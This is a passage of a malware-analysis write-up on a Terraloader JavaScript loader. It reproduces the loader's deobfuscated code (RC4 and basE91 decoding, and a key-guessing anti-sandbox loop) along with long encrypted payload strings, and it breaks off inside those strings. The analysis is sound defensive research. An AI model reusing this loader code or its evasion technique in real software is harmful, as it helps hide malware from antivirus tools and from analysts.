CyberThreatIntel/Additional Analysis/Terraloader/02-01-20/Analysis.md

# Analysis of Terraloader sample
## Table of Contents
* [Malware analysis](#Malware-analysis)
  + [First layer](#first)
  + [Second layer](#second)
  + [Additional Information](#infos)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
  + [Original Tweet](#tweet)
  + [Link Anyrun](#Links-Anyrun)
  + [Resources](#Ressources)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h3>First layer<a name="first"></a></h3>
<h6>This analysis presents a JavaScript loader (Terraloader) that uses many arrays, calculations and in-memory variables to make analysis harder and lower the antivirus detection rate. This loader has two stages.</h6>
<h6>The first block of the payload declares the global values used to decode the first layer: the array of values used as the key, the offset, the character base, and the remaining variables, initialised empty, that the second stage will use.</h6>
```javascript
var tab = [];
var base = [];
var offset_tab = 0;
var blawp718 = "";
var blawp4015 = "";
var blawp73 = "";
var blawp1023 = "";
var blawp7173 = "";
var blawp7178 = "";
var blawp9073 = "";
var blawp77 = "";
var blawp5376 = "";
var blawp6122 = "";
var blawp23 = "";
var blawp7 = "";
```
<h6>The next block is composed of two functions. The first uses a switch statement to select the character corresponding to an ASCII value. One interesting thing to note is that no default case is set; an IDE would normally add one automatically, which is more a sign that the code was generated by a tool.</h6>
```javascript
function get_ascii_value(arg)
{
var x = "";
switch (arg) {
case 32:
x = " ";
break;
case 33:
x = "!";
break;
case 34:
x = '"';
break;
case 35:
x = "#";
break;
case 36:
x = "$";
break;
case 37:
x = "%";
break;
case 38:
x = "&";
break;
case 39:
x = "'";
break;
case 40:
x = "(";
break;
case 41:
x = ")";
break;
case 42:
x = "*";
break;
case 43:
x = "+";
break;
case 44:
x = ",";
break;
case 45:
x = "-";
break;
case 46:
x = ".";
break;
case 47:
x = "/";
break;
case 48:
x = "0";
break;
case 49:
x = "1";
break;
case 50:
x = "2";
break;
case 51:
x = "3";
break;
case 52:
x = "4";
break;
case 53:
x = "5";
break;
case 54:
x = "6";
break;
case 55:
x = "7";
break;
case 56:
x = "8";
break;
case 57:
x = "9";
break;
case 58:
x = ":";
break;
case 59:
x = ";";
break;
case 60:
x = "<";
break;
case 61:
x = "=";
break;
case 62:
x = ">";
break;
case 63:
x = "?";
break;
case 64:
x = "@";
break;
case 65:
x = "A";
break;
case 66:
x = "B";
break;
case 67:
x = "C";
break;
case 68:
x = "D";
break;
case 69:
x = "E";
break;
case 70:
x = "F";
break;
case 71:
x = "G";
break;
case 72:
x = "H";
break;
case 73:
x = "I";
break;
case 74:
x = "J";
break;
case 75:
x = "K";
break;
case 76:
x = "L";
break;
case 77:
x = "M";
break;
case 78:
x = "N";
break;
case 79:
x = "O";
break;
case 80:
x = "P";
break;
case 81:
x = "Q";
break;
case 82:
x = "R";
break;
case 83:
x = "S";
break;
case 84:
x = "T";
break;
case 85:
x = "U";
break;
case 86:
x = "V";
break;
case 87:
x = "W";
break;
case 88:
x = "X";
break;
case 89:
x = "Y";
break;
case 90:
x = "Z";
break;
case 91:
x = "[";
break;
case 92:
x = "\\";
break;
case 93:
x = "]";
break;
case 94:
x = "^";
break;
case 95:
x = "_";
break;
case 96:
x = "`";
break;
case 97:
x = "a";
break;
case 98:
x = "b";
break;
case 99:
x = "c";
break;
case 100:
x = "d";
break;
case 101:
x = "e";
break;
case 102:
x = "f";
break;
case 103:
x = "g";
break;
case 104:
x = "h";
break;
case 105:
x = "i";
break;
case 106:
x = "j";
break;
case 107:
x = "k";
break;
case 108:
x = "l";
break;
case 109:
x = "m";
break;
case 110:
x = "n";
break;
case 111:
x = "o";
break;
case 112:
x = "p";
break;
case 113:
x = "q";
break;
case 114:
x = "r";
break;
case 115:
x = "s";
break;
case 116:
x = "t";
break;
case 117:
x = "u";
break;
case 118:
x = "v";
break;
case 119:
x = "w";
break;
case 120:
x = "x";
break;
case 121:
x = "y";
break;
case 122:
x = "z";
break;
case 123:
x = "{";
break;
case 124:
x = "|";
break;
case 125:
x = "}";
break;
case 126:
x = "~";
break;
}
return x;
}
```
<h6>The second function rebuilds, through a series of while loops, the character base used by the loader.</h6>
```javascript
function get_base()
{
var tab_string = [];
var tab_index = 0;
var i = 65;
while (i < 91)
{
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
i = 97 ;
while (i < 123)
{
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
i = 48;
while (i < 58)
{
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
tab_string[tab_index] = get_ascii_value(33);
tab_index = tab_index + 1;
i = 35;
while (i < 39) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
i = 40;
while (i < 45) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
tab_string[tab_index] = get_ascii_value((4450 - 4404));
tab_index = tab_index + 1;
tab_string[tab_index] = get_ascii_value((2169 - 2122));
tab_index = tab_index + 1;
i = 58;
while (i < 65) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
tab_string[tab_index] = get_ascii_value(91);
tab_index = tab_index + 1;
tab_string[tab_index] = get_ascii_value(93);
tab_index = tab_index + 1;
i = 94;
while (i < 97) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
i = 123;
while (i < 127) {
tab_string[tab_index] = get_ascii_value(i);
i = i + 1;
tab_index = tab_index + 1;
}
tab_string[tab_index] = get_ascii_value(34);
return tab_string;
}
```
<h6>The third block is composed of five functions. The first returns the length of an object and the second pushes an element onto the end of the chosen array. The third searches an array for an element and returns its index.</h6>
```javascript
function get_length(arg) {return arg.length;}
function push_element(tab, index) {return tab.push(index);}
function find_index(tab, search_element)
{
var index = 0;
do {
if (tab[index] === search_element) {return index;}
index = index + 1;
} while (index < get_length(tab));
}
```
<h6>The penultimate function compares two arrays to verify that they hold the same sequence of elements; this is used later in the decryption of the payloads. The last converts each element of an array to its character and joins them into a string.</h6>
```javascript
function compare_arrays(tab, tab2)
{
var lim = get_length(tab);
var index = 0;
if (lim !== get_length(tab2)) {return false;}
do {
if (tab[index] !== tab2[index]) {return false;}
index = index + 1;
} while (index < lim);
return true;
}
function string_join(arg)
{
var tab = [];
var result = "";
var i = 0;
do {
push_element(tab, get_ascii_value(arg[i]));
i = i + 1;
} while (i < get_length(arg));
result = tab.join("");
return result;
}
```
<h6>The last block, of four functions, comes before the main process of the script. The first function is the RC4 routine used for the first decryption pass. The second decodes the text byte by byte for the second decryption pass (a basE91 decoding over the character base built earlier). The third converts each digit of the loop counter into its ASCII code on every iteration of the main algorithm, which is how the RC4 key is obtained; as a consequence, the number of loops needed by the main algorithm is a fixed value. The last function launches the decryption of all the payloads in the script (exe + doc files).</h6>
```javascript
function rc4_gen_xor(arg1, arg2, arg3) {
var tab = [];
var j = 0;
var tmp_array;
var result = [];
var i;
var inc = 0;
if (arg2 && arg1) {
i = 0;
do {
tab[i] = i;
i += 1;
} while (i < 256);
i = 0;
do {
j = (j + tab[i] + arg2[i % arg3]) % 256;
tmp_array = tab[i];
tab[i] = tab[j];
tab[j] = tmp_array;
i += 1;
} while (i < 256);
i = 0;
j = 0;
do {
i = (i + 1) % 256;
j = (j + tab[i]) % 256;
tmp_array = tab[i];
tab[i] = tab[j];
tab[j] = tmp_array;
push_element(result, arg1[inc] ^ tab[(tab[i] + tab[j]) % 256]);
inc += 1;
} while (inc < get_length(arg1));
}
return result;
}
function decode_byte(arg)
{
if (arg) {
var length_arg = get_length(arg);
var tab = [];
var tmp_var = 0;
var inc_offset = 0;
var ref_offset = -1;
var ref_index;
var index_arg = 0;
do {
ref_index = find_index(base, arg.charAt(index_arg));
if (ref_index !== -1) {
if (ref_offset < 0) {ref_offset = ref_index;}
else {
ref_offset = ref_offset + ref_index * 91;
tmp_var = tmp_var | ref_offset << inc_offset;
if ((ref_offset & 8191) > 88) {inc_offset = inc_offset + 13;}
else {inc_offset = inc_offset + 14;}
do {
push_element(tab, tmp_var & 255);
tmp_var = tmp_var >> 8;
inc_offset = inc_offset - 8;
} while (inc_offset > 7);
ref_offset = -1;
}
}
index_arg = index_arg + 1;
} while (index_arg < length_arg);
if (ref_offset > -1) {push_element(tab, (tmp_var | ref_offset << inc_offset) & (255) );}
return (tab);
}
}
function switch_inc(arg)
{
var x = 0;
switch (parseInt(arg)) {
case 0:
x = 48;
break;
case 1:
x = 49;
break;
case 2:
x = 50;
break;
case 3:
x = 51;
break;
case 4:
x = 52;
break;
case 5:
x = 53;
break;
case 6:
x = 54;
break;
case 7:
x = 55;
break;
case 8:
x = 56;
break;
case 9:
x = 57;
break;
}
return x;
}
function decode_payload(arg, offset1, offset2)
{
var tab = decode_byte(arg);
var tab1 = rc4_gen_xor(tab, offset1, offset2);
return string_join(tab1);
}
```
<h6>Now, the main algorithm of the main function. First, it uses a do-while loop to generate a sequence of elements; when the generated sequence matches the reference sequence, the loop exits by changing the flag value (iden_correct). This is an anti-sandbox and anti-analysis technique.</h6>
```javascript
function main()
{
var seq = ["56","48","65","69","66","52","52","70","67","48","52","49","67","65","49","51","56","68","67","50","65","57","49","68","52","65","70","50","67","66"];
var base_rc4_array = ["215","222","25","139","201","0","105","245","65","151","59","255","225","38","56","210","150","155","102","217","254","187","160","241","186","19","19","145","227","137"];
var iden_correct = 0;
var inc = "";
var lim = 0;
var tmp_array = [];
var tab=["98","72","102","109","106","112","83","117","101","117","65","79","115","68","88","116","104","108"];
var index = get_length(tab);
var i = 0;
var result_rc4;
do {
inc = (i + "");
lim = get_length(inc);
if (lim === 1) {tab[index] = switch_inc(i);}
else
{
tmp_array = inc.split("");
tab[index] = switch_inc(tmp_array[0]);
switch (lim)
{
case 2:
tab[index + 1] = switch_inc(tmp_array[1]);
break;
case 3:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
break;
case 4:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
tab[index + 3] = switch_inc(tmp_array[3]);
break;
case 5:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
tab[index + 3] = switch_inc(tmp_array[3]);
tab[index + 4] = switch_inc(tmp_array[4]);
break;
case 6:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
tab[index + 3] = switch_inc(tmp_array[3]);
tab[index + 4] = switch_inc(tmp_array[4]);
tab[index + 5] = switch_inc(tmp_array[5]);
break;
case 7:
tab[index + 1] = switch_inc(tmp_array[1]);
tab[index + 2] = switch_inc(tmp_array[2]);
tab[index + 3] = switch_inc(tmp_array[3]);
tab[index + 4] = switch_inc(tmp_array[4]);
tab[index + 5] = switch_inc(tmp_array[5]);
tab[index + 6] = switch_inc(tmp_array[6]);
break;
}
}
result_rc4 = rc4_gen_xor(base_rc4_array, tab, lim + index);
if (compare_arrays(result_rc4, seq) === true) { iden_correct = 915;}
i = i + 1;
} while (iden_correct === 0);
seq = 0;
base_rc4_array = 0;
i = 0;
offset_tab = lim + index;
```
<h6>Debugging gives the following parameters:</h6>
|Variable|Value|
| :-------------: |:-------------:|
|i|200|
|lim|3|
|index|18|
|offset|21|
|tab|[98,72,102,109,106,112,83,117,101,117,65,79,115,68,88,116,104,108,49,57,57]|
<h6>Once this is done, the script checks the flag again to ensure the process completed, then launches the second layer.</h6>
```javascript
if (iden_correct === 915)
{
blawp4015 = 'EeIv%zg?"inD5mU';
blawp73 = '3^WFo*N06.xVSb8.';
blawp1023 = 'c{+tm06*B';
blawp7173 = 'rVVF=+;Msl7';
blawp7178 = '?@1YW3E[A';
blawp9073 = '`EWyt';
blawp5376 = '9gIcn}d@)WoL".]xrZB';
blawp77 = 'hVbb<+R07.PsT.d';
blawp23 = 'Xejbr';
var blawp868 = 'q=bb.~cN[mUHO^M;T<B$Yr@5Xjzyu_6OcR%#u^#z(Wj|,l1OQ?`Y`3&:yP6jr`pq&j@oTj!%DX)"ZwG8uU!xHk$Dl="P8>gir$1zw9x$P!SgaC%;HP:{jG/im!gU&7I_X(IklQ6[dG:PI`<>ZU`iAc][&^z|Q3GIr&m_vK&#QGds:INk+7`NiTh1c*TimXeNl>z$f=K27q&v"evZ81mV7h+Ds+@6n4CO>c^?FGZ`+Xs&ilJY0ma!F}(/nRF5/XCCN3~jd:%t*te5uDgh73d^1FtvhwW!H`N%B&r?or8.u!An#v7^5BfjKW^}K]yLh(<9MI>9(AUb^f"Go8]l9Svylk=84;=X/jrf_cFHX3H87ks:=4.#Qx)7"c*A}pF.DgkQ1.<uwtHp/fHs$cFpF,yIqjo{,yERKl&lG{X6Vv<l}HSE0FxpmiQCF_75a:[T:/66OH|832~;D?:w5&7.3o:lYSd&X7YrI:R?kSfVhVU{=9D&5c&Q>?:Ei>erfni}J?>[)Q12+90Ct%&u8KG!|K~I4jOoHq~Cc_$?dI9ZN`EVe/r{W7nZ+{Zn5TZ"PA)l8RqSbSZDPDgh_=?M7:/8q[b6q]1]oo=.9T>38D&8&dL"ljtw/2UmHaDzWTa@Mb>Ln<]>[+<r<jaqEhz`|U>c(B9>9MttCS$DF:84O%E:d*MX:[{>B=8;`?5]9?0l)Z_.N=4L>B3UvT/lus:IHrmtn{q+q23FxTyl/NPB4f)Y^njSKZ!]xy_tNPq=Uq+[BNdL=(7z}r%}$>(8?_gKBP16yH9I{JU1t`Y7&&#d^3NC"+KuZ%FFI&jE+rX"fy"h@>8XQd@siq$K@+eTbFVQ5+Y33P)H,7dx;&@taQhdCObU7NxRAb{Y2kI+UL9f5X+Dxb&?DR|?khKIV?X[QFerFIeL[R~{D_WkQ[/iU=,?|YMg}tq#:Q$2`~J)HvEPJDalFC;^eQBl@x3+d|::s~SqlJ,u0UG.LiPHm/+`_%&gNK=".:2PTz<{6pdCamXVxavWxgz5x;[2>O2eI1_lEysb&._0.s+Bp4f&@Z"I:G`V~e5yGVvJc5HEVMU<m>(`wRfhv(q}nFp_|#s!"Jj0;G]u/(kjE|pDbu@bHq:r:I4.n5w@Ri#whG0t5+Zt)uGZb9aYqu7O|W5=;IL^7Nlm3K8>]7i*NBK7T"_%iJLKQkz^O6CL.~mG:la+&*dd^DW^AP0IZjd]&&KMKhXs/|y:2jo;duQ>zbNdo#|hn2:0v)SK!zP9ZW_#8Gl3;bZ>SnnpM2"w_CoTGG^@5d:o4mLK#c(xs)9V)jg;xoks?$z0s~e2!D5[6i^Sq.f(hlh3B/A[O`6r]H{7b@Shcy#+uG<QmV8FU/8Ji.9!B|9&9x"T^v?kNDI.Yk@nmR|/+]>T0s;M<)FOdw4.o`?a[qM}`KU[]4"SSBn~nZIdF<z6Vnd^aLn:~eV6yhOR3$q>S/@_W71{qzi%E=FM2sJb[oG.8fgz19nwwKHJSWd@,R@sfn1|?dyzcLk34r!m6c,LW^ZYKf/!,uJ(e3^09)"dgou=Uim<>M)Yzu?e+m:g!za`UIFu>j@z&TRB2KJqL!w?(tk==yUir5<kin>"0dA7Wc=^3#9L;0FZ$_J0N@9z%QT)[t,8H?P~%[R}Z=}rYO)X3nI?D#W[1$]WSUQBro@*q?EQ_{vVEKbijf>|M+?%>~wgHX*?bU<FY<{bMW?&zsVSbiN([=wu]x&NCw`hcspm*W51M76I7H"|6/qG&]$v%&o*6z7KFdIkC.BI>v%8~tU/ppM+|C~`n<l$G}]e!a..mGr*FQLXs<PXg(k_~kT!Fb6NelklQQ7>(U!U3H3d7mUT<fOqi@aDz3I+4RZtsWMw;RiKgdFSpcSoA!^3!g<t)Kg(W}5Pt2}F3_C&1{tJ;$vG%Btc.9A}y`wJXAI%(kOw7tQ$@<,4AM.cjRISM|a7jewR`m"d0q],6gA(`X6<v_]EE.jk=O4h?e8^?^"/^]5"
kf:]Y!YZ|0sgNZXiJRhfQ3bxHpf2Y=&>=7^_KX!tjE^?BsgQF]2Qx9|u[ManzpM2$uuLM/pV,_6C*MPwd6FrUJM$$xEyrp3$`NLM,.2D1i!;l}<yQILB"*C3n)9T,i=O*a5Gc|8>jfl({3HPnb3I84iD8~IrJ&`zyKom&Bb<%,0%i#/VV`^gK%YLjz]@HcUB)G#1wta6_qTuvDPtS8<9!MK3#tJrjcxxEAb#6BFpxO+x1L*9;k{6J(JoLzHNZ[,&|1^8@l8GPJGnub0_Gut#EgxuG(O)pC7n4t>@?Jk8q=eLRj.lJkL.*S5pZm/b?9p;q{LNL_7^~khc0VY}Y,~SMrHP602%hT|@b$^D|hh3)u+4B^JEs%RFg;NWJVph7]ON~KL)Veu_GC<`xkFbH?9bu/Y?s/Rhdc$5|jC1{_9y<W[s_>@LRL[Z**6uf/4AQfTGWcdOwRUz,_hjHbi@hC{_{8@Z=D4pp|UR4@ib>L5fkm[)"kMz.qbXjRQOVE&Gf`]U.Wk>3IT+<>)m/Rw;6GoYK7rXV|a^y+ftjnvn=Q!q*7Cl886HSnjpZ`OzRayeH&VIF)uyW(dMbR4KWxKp"4$lI}91{e4=H.2$=p1UBpV0<wPXv:=)mzQ`$]>qK@$Fjyv8.y0>cbl:Hc{ayQ+M!Skk%f9sHAe/$1s4=9#N_~Kw0quNvH`[UB{]e|97O:$9h/A?;zXFE7Tf+[WJZBRXB,m]F|DUPRp,Yvo,VT_ow8S%ZV:|q+Gg1Kq&Tu+e;,Ls)*(EH=y9V{WN{drs3bfI^^Se/Xb=qT<VCb`I7t)3I[LQ_g@d6K^#_wNm<O/M=~AS&p6GI5=4:x&{fK./G+om|&1[7P/v5W?Ee~IyaRlcgOY[c[d7e3=|K5}dMCaCg`y>F}3y?^e1Cq)*ROylJ<BDKjtK.IKQP,BvyjeP$=N%&7tblRA*3q/(mr^LV)B:]6r$]Q.+wXeGmA8IDaJO$}0j|<|*}6>VI~`F%B39wSMh]8idYkQDJ(@.(T/!"o/L{OwE~_bC*Z"h.,E(:6yM}hn|@E=k1M"e[|y*#p25Bc#UOj~WhPB:^&DuJFc?1nBc,X]O_iOl[Yc}!4[#&Gn.XSP5QpGpUvJ[>;Ye#D%nK#%%DqU~qTubztqJAMC=E"Nux,zvGed}F|WMl7dS.[vS18e!g;8~ZWI8A?6e_X:Moc@G@~S@Ks=Ui{~O+meM{kn_8:e8HZLIW6)<Q}](,EKl!H1N^_:<"|#y_9Xa<8U1pi;.Sr.G15/x[9xjXDHnpiJXL^C^W/_Q40}q42lBFpN]4Y]WP&AxgE<5?C<b|JSijmwL01yET.YX1k<S"p9,/CdRDoM;>{a3J^;1$*ItMkidms15kW7ENZEDlcTH,;h^9>j{VCQwDRb;v_v/3:,a;E!=iP3QF|pt}E]#5/s<5|]y)W<N|,_j2B84hhZ&0BWPDbyD[+;:GEX.*~whE<Ojwf.s#uG+9&L2;f/$H)8r+.1O:BRab@wOdhdGAQuP+9yJz#rz)g|G$f*96fEq$#7jye)%e|AnKibSFh>EC=R)|>=nURCnT+0:"f6,<kWLV:>KvR"MH%mJa2:+:khs6H;x_dP.mI%@G:otAi_~CX:otyXM)adAiF?T`_!/Zyo4=U8*UeQ^Y&5nMnG7,8a/imXBBMSqe5uJ~bY#cQ=sDD[i"C$g6cgz!{j0.JEk%f#8CqvWXi{N:.mrS~:,xa6wV6*~:,"ZkEnDGyNd]FB$r7}0|[VQw*9U56/ur#BhQEjZ)z.v70:h|w#&l3RAy`cMe!AtUZJ$4I^[d|9QkL31S>vQj9u9=VzdNLzdG4P!NkARtg1|`yROgm[R.?@sq.y#)u$J^q,fvSY;A1O_ZPS[z!][3kIvG@QD!*IV3ocvcY*Pi_SjeBeuYctjZ:2wI6U;*DFTH+4:j_!z!@Z#VfIruW(+I0~`h&U`8lc06O=(,si8o]pnc8C`J!b&?oS_>_37Ty&#MX+oQlzemlX?H%p^h`K?,r8h}KW^
K;Gl~*Z$8C2$:aSiYERHjuk@S`:&Y6xySSXFQ[VzF:!j;iBT:esfDH@v<i]qR|pP7{OO:NbKX|M$t]V.aOQAX{HRD[8IK
blawp718 = 'E67!RGb:wf[2S)~g"a.$?&%!(h5Yt;KdiJ6[hD$0AlfRt6pbY/c2xYicDK+k7stKIp7Q<ws3#<V^.=pQT(|X0r%)E2x<pIR;l3.`l<ghx^G4svt9g^#^x%3B!iKS)%MvX>=KXntvTu$j7)my61dw2`fB+a3vz~oD&qg8O{q&8<MX7S6_xX(v/t8CSK3htOjD(MmMH)LW4,/vr3}@D5]o|[&A?:^hX$|JH//5YR2`cy!q@r(sjx~p(47FfWsIVz!H6};h,yTgiJagSF#X/Yn[MqDF;3v,,`[uer.w/WH9Ml`xG6<pxY1hvEk|O[x+hw3T3`+[=m"T673bk@D/PxL%M_fg"4M?91XN4P"Bpb0pYeXG6(/p|iN|$uz*8/e%t>HxM&TJ5V&i8s+BkHP~6=6j)]veqcy$*hlK4G(/8Q},.t/XPV7*~YhIXxfN?)3UrRh5A2m:=gv5&.`ly{,#o![5w|H@"VK"Qkeae>wUxj(3g}:e`iYd<a$9wx%oy/~^ynvhLZwM%a}|ccAdv&t_JaU{4kYNS7`N;gL=[8j1S}n$T9e=~z!KJl:^Zk:abkm3?c~`24*ZOckTcaL[O#WVn:27NboU53]WLeI(&z/5xx,z4M/}R=w;|/Zl&YtKQe_Y3nFFLl"+8}Alwd5dsUP(lMkG1*q,KS70)k<EE{rmzb~8lkSq3tq(ReUO9w7PG05*>S9=AW2wd<u_*D8("n.|cQFer6]s9~M30mAY~f$nuMR6R!|[yUnk_w`HE!(kle8Yr;cTgG=)T?&G.K698U3sCQBwl|)#}|U#X(^3[FcX.Bq`(#D;,&w+"67EQ~L*Hb`BZ@![/o"r<OpUOY6@lJ#7M^C5H=IAu{"J1Bn~EN9fkM<5*K(smivo"$lqfPIl5?yT9>4Vh1;(.A}BN{X+!;VN*w|D.22Z*6:<X&Xt48,fsG|zK~ccqxpQ/1RxtZ5iA|!sr""a;s^i1imaS?KwVD"KM|3XY[5r55,[O!d3jrz|26;WkiFV?/s$}[5yUhT&B?:HGxoi,aJ<Yu7X2)c3mCfNUT6Z|zGYb.p,Q87ntx3J]}`mL,Nd;MOL=`H^_fIkdt]<6aIwMj}Zj{B3Lrn^]gu@2!?`@.ol]g*?lwG9,Ad{yCF7!MfBF4nI3IZL.T7w$nG:#Ik)`vS)&D#qrIC]7DM0+D&y#te1Z!3*ntJ!HN4+qM43c>C^I5*JnhNe{rkFT[7YI;W`gT|#XEw_[z"j[EqGUp[/$q[JTHa$:DURH3aI@kF%8^W>mrTH}!wxKwSxY@/g<F/cAw~zS0d@0:Cm~|$&dl,g`"A$86M0y]n|C83R5@z/[CbPJm1$wQ1s1OGT:(0kG=>).^H"b{4gd_G.xPh(s[g]K*9%*6OD&#8^p/g]*8*pV~<F$UocCpwtx[Kfew}Z2?m72ozqh&f7h{n!S;T(#ZH#JD.3Yr_]4Y)~|4i2B8`p/d>~Gkk%8/1:^2]L*HM7L2=G|V^uUqoMhXn%FR0amh2>ELq:Dg[R3qU>~U;6+I=~(<tG(0H<5!olun82p}astns2*Yx4:1JHt/o>M/Iy}#_#*r!*k}._A[?=2)>~<7v#AHx&B5<jj]QyX_9S$^%#qht%!nk033n/O!S]1~@T1iG)5.+W&;Mq@5bO1M%#NSb(W&/Roa<9nh@k<$aoY&}E0vBP4`16C33Or=Ecwr?H^HJ%`OT{KLvbnh}X7zFon7GV}Jy%hBg^}2CSwFTF>SmG)Q.,#G_p,kssy<Q7X7zQh:On8jNWfn<%y<)j,!dzP,^MxI=uDV|a+KUKEtl|,`"2za]JXTm>Y<XNgl!{7`L_"}?Qx~rZ[$Kw;*dboGmN9u(CYb7PA@fVpd|#u=P*B9"N:Lz/v,9KkF!Y5>6g(,=dqa1D~H=$YZyT+.<kMbwo=VYhm1O5DX4YK&7.U17ayk4gZkIV:~q7i$j}SwD1OVE&p[=XO)WP}G0or.ScRj!fV>5rUX0VwZlI/`O%[/TgeYohT)aGpHv.
)7MJPYfS8r@m6#>cg}:Z.jC(vbr,i<6us61JpmK{x3XeU1"%vesl~<stwtbcWKFi|km:.boL">"M:/6}Pg*5SYRh^]#UeAyl3M/y{vy<z`g#~z.SW0Ta!*yYR_6sVE3wz%x8J=j8t__gw!aHpP~Mf<aj3DKue&jtMGHWa;kR@;Ofo4Dxp|&JdKUE^(|tgcp+{Ek%+]#HR[xG#@I3bef_LZANwbDmuR24hV+&v0ItuMv*R1L3*5&mMIOpYRw6#k_KS,=M`K32cNuU,4w)y9(lrX(n7^|doU8Py0E;PHkaQUTWaIMfEo@crD+4",dWbz:J6//91Dw&jCe4p1U%]2gC7wVmBS:4231n=_`|C4+%Ze9G[n5b4/VW6II2h{iEy%+F4di.Ww^co9@|aJk.moIdetaCNmJ63Sj5:S(tNAQ0tCEHF1~Z3n9I(wKV`DWeYB_g6T}V0iXrXU(yLq6$a_Uqo<BVPm:0G^E_dNWW+BeDD)GoHowGJu1wug&Ztf$L%(m^D0<@4PE<u^)&ql,u45m^<sQ9qD~q3u<L=F=dH<$Cxzbta#G!aLNK|Pm62gHrT08kxZ0.NW)rBKd)#x1_$Cc(YQs~JCS|Lqi=Ir8|"4+0gFVV]o!Rv3$s$5tq(gM#kfY".ngI"0=~<x^8[sM(d,0M*Riz3Ep)EzTY_=;ECM&$Acd"guzs%xysssw5#Z{0$t_zbfu<X*VIt;W,2h14%Kc`q|gZ^LMxr79h=c#kF5k:1Q&3Wf=ROsMnxcYS1(bE(:kaJ5qIQxEhOHXJ@?xk~fabd~(G&]z%Al]op0f!q[`]cGLWF:<;}alefW7p0XcFDUyakbDsc`V)S7J2geHq/m$hb|Il,H8!XS?rVM9IM=^13iFc{#Rb&~gypStO_OErrlbs6a#CduM<1"^%S0054yUP@O0%T@`5~s!td^CxPFO"W[[hGXKU(]9{lE7spnZnVH^JV=.(Pw.%5Epg:fMj{rk`);dym21kO.mku;[0(roZUotgH?py$1?|#r0=q.1UZ]V}g1jN!O<9t2);cI:z0l%jJuM*mu&C*G]u>aswD[9SAN{8fJdfmLUpUWXEUV]P2z4_kbW?@&QS,3G_moQ+c?hguUS2t><z%[2KY*MW^8`Ifk$U{uA;(Fp#$,bbe4UG;<(bHmO^$:z6Cr`sFKQ3SGDGo8k/qM@b9FS~Lc=sWBU?`MBfVxHp}6G0r/:hOI}e%]Sj!~TAwbokR+Om9"LnA/fBbrkN`_*14;Cv8rzTIhF*4MDN9w8:V%OO#(j.n1ZjQ7U+/K`<.ZK=Q^S{E&T%`@2.R.ir!1>_bJZ.tR!IHz>E5cnF*~Xt`}P[Mb$dE^AjTWRBa})*{TC|i/yP&@3UZI"@h6S4k4)Hp>b5}`b`Wfjj.lvm(r4]<GlxlQm:7:&g,E(G1BzSD45_0vatSc_cY`)_Bf&5UxuAP(3BYFX*(<VKZBJj#L>~aoy82zK#[]E"U3|amry,<(8=z)wr?F@?kEi!Tm=zYmgL$p|~X$>2eHs:AOj"MH49cGH}m|uLoYzYz={g!&h,bNU>uxqR]tGpe<W7Nnkj!F.AF^+"JwshUJ*6ljn~&Q!ZhtYPZwna>g@I:>9&"6w9zqsCe{R$eoo`F%!i~rwcXR7D9iw38JDN60J[w;Gl.gd"[.iA1wvO#}2Rk3TLqMs"QlZ$C]d!8[Np/52sG/YAd<ql6QGt(2XuufuD]G=/,9t^$Z>v(C]y7wIPHaV(C/#kY;>3L;%*aTlZgOfcRB,Ti+M:}0vX8Dr^P:+h3$W0hCeh@JTjS_0!*oI6~f_<m_T}Zqf=]PURHb{Y!i%5xkpem2|%0}8u_H}s?=,uf&K3PdEubB$=Va"naBG5spZ6BRub6vZOe/D"2F>g%}$f.6{f$ujV7Jm9uU|]}BucmE)R6]D)#ypYQemEfGKJ`(ikEwLJNM#H8BfS^`x+J7sFy){]W{/,r$*`0#GX_<(jyd,paP[O^:!oK`f.hzOHj_wP%VSia=/xm(vF2QUR
g]+8+**!mf`n"jY|}hJ1u![0d#sokqnc~l"c9BG33m$cl`/p3R!A}8,f79hr&ij_"&3+XCzn/M60QNf8X,:@CVFQc7A89s
blawp7 = 'uDoz8dcqqO?2S)W5pa.$a(%!(h5Y~HHdjJdIaJq{AlfRt6pbY/c2xYgcDKW07stKIp7Q<wM3!fa_.=@LenP+B^A^Vwv>_n=`s>j;~jPvc6p7=:[nKJ8w229}0Pkb&]YI&kP}rI*aW^~N(ykhcF:ovE9}W#lqpAy<7)buVu=+Nj(@#@#vW>N&K(e}`!+Yx,vi7^:m}KzmT2K&Z!wxl9z*827~NPM3*ZF@onTg+.mEwnevUuZt5oDwZhd_9(w[,me]juM4Vn*55j43]_t&T%1I@v/_RixSVELr2uUpV(`c@0HobgQwqUT0t`5AnE8>75T@mCLE1ZFnS8K>:xt1n%p5`C=/uQfxQ#2lSlC~of3#8c@pS4JYx.ou8&UKQIfM+yr%{4l`S?7.9WLsd{o"IDJk;uil[l@/FOlqgr1,f#I{}mFn=nJyY9^q#gPTaF>n7`8ev<]w.k5e<,w@i)rTp&.&7A*)yL6>}@H^n+sAy`E^`hl0@G>#[Hyw0.8cd6OC0!"Y/O&])cC?bG)cp+#tbTVi@F324]y2l#KY]7<8W"(:EN_cZTfspEm*<<;z?+.+T}?FRXO=)%xg422<_Mz8""Z,^=t.C=UeLNs?.sg7clRI/p~eilw7$|68Sl@+4?=y(j/y_?39sVh}mXnXECWbYRR|%`fZ^v7uMk_o9Z(Y,/McQBT#LiF>doBlwuKG5Bo6g?%B&c2P[Y/UByV{,`gUwkH0Z%kBP@3#$XO|0]?z1q+=zH{pI2jM*y5n.rfrSM~go^UGw+7Y&NJ!!$1%2<C0dwM0Ecd.`Q0YJC